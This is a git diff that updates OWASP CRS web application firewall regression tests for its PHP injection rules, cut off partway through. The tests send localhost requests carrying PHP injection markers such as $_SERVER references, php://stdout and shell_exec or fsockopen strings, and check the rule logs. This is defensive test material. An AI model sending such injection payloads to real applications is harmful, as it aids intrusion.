a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index a9661c56c..82116d6ea 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -2,168 +2,157 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 933120.yaml tests: - - test_title: 933120-1 + - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=opcache.jit_max_polymorphic_calls%3d50" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=opcache.jit_max_polymorphic_calls%3d50" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 2 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=session.referer_check%3dtrue" - version: HTTP/1.0 - output: - no_log_contains: = found within - - test_title: 933120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=session.referer_check%3dtrue" + version: HTTP/1.0 + output: + no_log_contains: = found within + - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=engine%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=engine%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 4 desc: "PHP Injection Attack: Configuration Directive: extension" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=extension%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=extension%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 5 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_retry_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_retry_limit%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 6 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_stack_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_stack_limit%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 7 desc: "PHP Injection Attack: Configuration Directive: precision" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=precision%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=precision%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 8 desc: "PHP Injection Attack: Configuration Directive: smtp" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=smtp%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=smtp%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 9 desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=unserialize_max_depth%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=unserialize_max_depth%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index f2d3f9436..e0cf5b0df 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -2,102 +2,95 @@ meta: author: "csanders-git, azurit" description: Tests functionality of 933130 - enabled: true - name: 933130.yaml +rule_id: 933130 tests: - - test_title: 933130-1 + - test_id: 1 desc: Basic Request nothing should trigger stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933130" + - test_id: 2 desc: Trigger a basic request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SERVER['test'];" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 3 desc: Non-Server Request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SE%20RVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SE%20RVER['test'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933130" + - test_id: 4 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 5 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 6 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['request_uri'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['request_uri'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933130" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml index 6bc3f6ca6..901d43f5d 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml @@ -2,54 +2,50 @@ meta: author: "csanders-git, azurit" description: Tests functionality of stricter sibling 933131 - enabled: true - name: 933131.yaml +rule_id: 933131 tests: - - test_title: 933131-1 + - test_id: 1 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933131" + - test_id: 2 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + no_log_contains: id "933131" + - test_id: 3 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" - version: "HTTP/1.1" - output: - log_contains: id "933131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" + version: "HTTP/1.1" + output: + log_contains: id "933131" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 9db6f3c0d..64ffb4460 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -2,24 +2,21 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 933140.yaml tests: - - test_title: 933140-1 + - test_id: 1 desc: "PHP Injection Attack: I/O Stream" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=php://stdout" - version: HTTP/1.0 - output: - log_contains: id "933140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=php://stdout" + version: HTTP/1.0 + output: + log_contains: id "933140" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index b72c81fc4..658a0fa21 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -2,572 +2,536 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933150.yaml tests: - - test_title: 933150-1 + - test_id: 1 desc: phpinfo stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/phpinfo" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 2 desc: base64_decode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/base64_decode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/base64_decode" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 3 desc: base64_decode mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?base64_deCOde" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?base64_deCOde" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 4 desc: bzdecompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=bzdecomprEss" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=bzdecomprEss" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 5 desc: call_user_func stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOcall_user_func" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOcall_user_func" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 6 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOfsockopen" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOfsockopen" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 7 desc: gzdecode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOgzdecode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOgzdecode" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 8 desc: GzInFlAtE stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOGzInFlAtE" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 9 desc: pHpInFo mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOpHpInFo" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 10 desc: gzuncompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?I%20don%27t%20like%20gzuncompress" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 11 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 12 desc: posix_getpwuiD stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 13 desc: shell_exec stages: - - stage: - input: - data: Shell%5fexec=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-14 + - input: + data: Shell%5fexec=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 14 desc: ZlIb_DeCoDe stages: - - stage: - input: - data: ZlIb%5fDeCoDe=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-15 + - input: + data: ZlIb%5fDeCoDe=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 15 desc: get_defined_functions stages: - - stage: - input: - data: foo=get_defined_functions%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-16 + - input: + data: foo=get_defined_functions%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 